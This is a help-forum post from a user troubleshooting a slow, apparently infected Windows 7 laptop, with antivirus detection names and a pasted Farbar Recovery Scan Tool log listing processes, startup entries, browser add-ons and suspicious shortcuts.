Slow Computer, Multiple Infections Detected

rootkit trojan


#1
dreamtime

Hello,

I'm working on troubleshooting a laptop that has been running slowly, most notably when booting up and when launching a web browser. Navigating the Internet on any browser is also rather slow, and other devices on the network don't seem to have any trouble.

Malware was my first thought and it appears this computer is indeed infected. I have tried to follow removal guides, but either something else is interfering or I'm in over my head.

I've run various scans with different security software and got mixed results. Malwarebytes says it's infected with Trojan.Fileless.MTGen, Rootkit.Fileless.MTGen, a couple PUPs and a few false positives (files I have confirmed are safe), while Kaspersky Security Scan reports HEUR:Trojan.WinLNK.Starter.gen and Trojan.Multi.GenAutorunReg.a.

As per the instructions for using this forum, I have run FRST and the requested logs are posted below. Thank you for any help you can offer.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-11-2016
Ran by Owner (administrator) on OWNER-HP (29-11-2016 18:14:19)
Running from C:\Users\Owner\Desktop
Loaded Profiles: Owner (Available Profiles: Owner)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe
(CinemaNow, Inc.) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiWatchDog.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\AMSP\coreFrameworkHost.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiSeAgnt.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Online Games Manager\ogmservice.exe
(iWin Inc.) C:\Program Files (x86)\Pogo Games\PGMTrusted.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtWatchDog.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\TMIDS\PwmSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Exent Technologies Ltd.) C:\Program Files (x86)\Free Ride Games\GPlayer.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Software Updater Beta\ksu.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Service.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsd.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(Advanced Micro Devices, Inc.) C:\Windows\System32\atibtmon.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2281256 2013-07-05] (Synaptics Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6489704 2013-07-16] (Realtek Semiconductor)
HKLM\...\Run: [HPWirelessAssistant] => C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe [363064 2010-06-18] (Hewlett-Packard Company)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [2327952 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [Trend Micro Client Framework] => C:\Program Files\Trend Micro\UniClient\UiFrmWrk\UIWatchDog.exe [246264 2015-07-16] (Trend Micro Inc.)
HKLM\...\Run: [Platinum] => C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe [1258496 2015-07-16] (Trend Micro Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-06-17] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Microsoft Default Manager] => C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-03-24] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [586296 2010-11-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
HKU\S-1-5-19\...\Run: [Exetender] => C:\Program Files (x86)\Free Ride Games\GPlayer.exe [4973456 2013-03-14] (Exent Technologies Ltd.)
HKU\S-1-5-20\...\Run: [Exetender] => C:\Program Files (x86)\Free Ride Games\GPlayer.exe [4973456 2013-03-14] (Exent Technologies Ltd.)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\DOCK\HPAdvisorDock.exe [1712184 2010-02-09] ()
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [Exetender] => C:\Program Files (x86)\Free Ride Games\GPlayer.exe [4973456 2013-03-14] (Exent Technologies Ltd.)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [WeatherBug] => C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [146736 2013-11-13] ()
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [**cahlhsssc<*>] => "C:\Users\Owner\AppData\Local\767c1f6b\2930e3b3.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Policies\Explorer: [NoDesktopCleanupWizard] 1
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\SCRNSAVE.EXE ->
HKU\S-1-5-18\...\Run: [Exetender] => C:\Program Files (x86)\Free Ride Games\GPlayer.exe [4973456 2013-03-14] (Exent Technologies Ltd.)
HKU\S-1-5-18\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Kaspersky Software Updater Beta.lnk [2016-11-26]
ShortcutTarget: Kaspersky Software Updater Beta.lnk -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Software Updater Beta\ksu.exe (AO Kaspersky Lab)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2013-12-25]
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office10\OSA.EXE (Microsoft Corporation)
Startup: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0844133a.lnk [2016-11-29]
ShortcutTarget: 0844133a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c3f6703c.lnk [2016-11-26]
ShortcutTarget: c3f6703c.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerReg Scheduler.exe [2012-11-11] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{C05AD519-926E-46DA-A286-D6B3A0E85834}: [DhcpNameServer] 168.94.0.15 168.94.0.14
Tcpip\..\Interfaces\{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://my.xfinity.com/
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT/1
SearchScopes: HKLM -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> DefaultScope {EEE6C360-6118-11DC-9C72-001320C79847} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {DD66E0F9-891E-4029-BFE7-4D11B4EC6A9F} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
BHO: Trend Micro Security Toolbar Helper -> {43C6D902-A1C5-45c9-91F6-FD9E90337E18} -> C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_111\bin\ssv.dll [2016-11-26] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Trend Micro Network Filter Plugin -> {959A5673-7971-48e6-AF54-58F745AC4ABC} -> C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg.dll [2015-07-16] (Trend Micro Inc.)
BHO: Trend Micro IE Protection -> {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} -> C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe64.dll [2016-06-15] (Trend Micro Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-26] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2016-08-23] (HP Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2013-05-08] (Adobe Systems Incorporated)
BHO-x32: Unit -> {2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3} -> C:\Users\Owner\AppData\Local\UnitLayers\temp.dat [2013-04-06] ()
BHO-x32: Trend Micro Security Toolbar Helper -> {43C6D902-A1C5-45c9-91F6-FD9E90337E18} -> C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: GamesBar -> {6F282B65-56BF-4BD1-A8B2-A4449A05863D} -> C:\Program Files (x86)\GamesBar\oberontb.dll => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-11-26] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Trend Micro Network Filter Plugin -> {959A5673-7971-48e6-AF54-58F745AC4ABC} -> C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg32.dll [2015-07-16] (Trend Micro Inc.)
BHO-x32: Trend Micro IE Protection -> {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} -> C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe32.dll [2016-06-15] (Trend Micro Inc.)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-02-28] (Microsoft Corporation.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-26] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-08-23] (HP Inc.)
Toolbar: HKLM - Trend Micro Security Toolbar - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Toolbar: HKLM-x32 - GamesBar - {6F282B65-56BF-4BD1-A8B2-A4449A05863D} - C:\Program Files (x86)\GamesBar\oberontb.dll No File
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-02-28] (Microsoft Corporation.)
Toolbar: HKLM-x32 - Trend Micro Security Toolbar - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe64.dll [2016-06-15] (Trend Micro Inc.)
Handler-x32: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe32.dll [2016-06-15] (Trend Micro Inc.)
Handler: tmop - {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg.dll [2015-07-16] (Trend Micro Inc.)
Handler-x32: tmop - {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg32.dll [2015-07-16] (Trend Micro Inc.)
Handler: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Handler-x32: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Handler: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ProToolbarIMRatingActiveX.dll [2015-07-16] (Trend Micro Inc.)
Handler-x32: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\UIFramework\ProToolbarIMRatingActiveX.dll [2015-07-16] (Trend Micro Inc.)

FireFox:
========
FF ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\c5r6u3tc.default [2016-11-29]
FF Homepage: Mozilla\Firefox\Profiles\c5r6u3tc.default -> hxxp://xfinity.comcast.net/?cid=mtmh07162013
FF NetworkProxy: Mozilla\Firefox\Profiles\c5r6u3tc.default -> no_proxies_on", "https://localhost, localhost, 127.0.0.1"
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension
FF Extension: (Trend Micro BEP Firefox Extension) - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension [2016-10-21]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension
FF HKLM-x32\...\Firefox\Extensions: [{22181a4d-af90-4ca3-a569-faed9118d6bc}] - C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension
FF Extension: (Trend Micro Toolbar) - C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension [2016-11-13]
FF HKLM-x32\...\Firefox\Extensions: [{BBB77B49-9FF4-4d5c-8FE2-92B1D6CD696C}] - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension
FF Extension: (Trend Micro Osprey Firefox Extension) - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension [2016-10-22]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-12] ()
FF Plugin: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-26] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-26] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-12] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2010-05-05] (Adobe Systems, Inc.)
FF Plugin-x32: @exent.com/npExentCtl,version=7.0.0.0 -> C:\Program Files (x86)\Free Ride Games\npExentCtl.dll [2009-12-27] (Exent Technologies Ltd.)
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-26] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-26] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\6\NP_wtapp.dll [2012-10-23] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF Plugin-x32: www.exent.com/GameTreatWidget -> C:\Program Files (x86)\Free Ride Games\NPGameTreatPlugin.dll [No File]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2013-07-16] <==== ATTENTION

Chrome:
=======
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default [2016-11-26]
CHR Extension: (Google Slides) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-11-26]
CHR Extension: (Google Docs) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-11-26]
CHR Extension: (Google Drive) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-11-26]
CHR Extension: (YouTube) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-11-26]
CHR Extension: (Google Sheets) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-11-26]
CHR Extension: (Google Docs Offline) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-11-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-11-26]
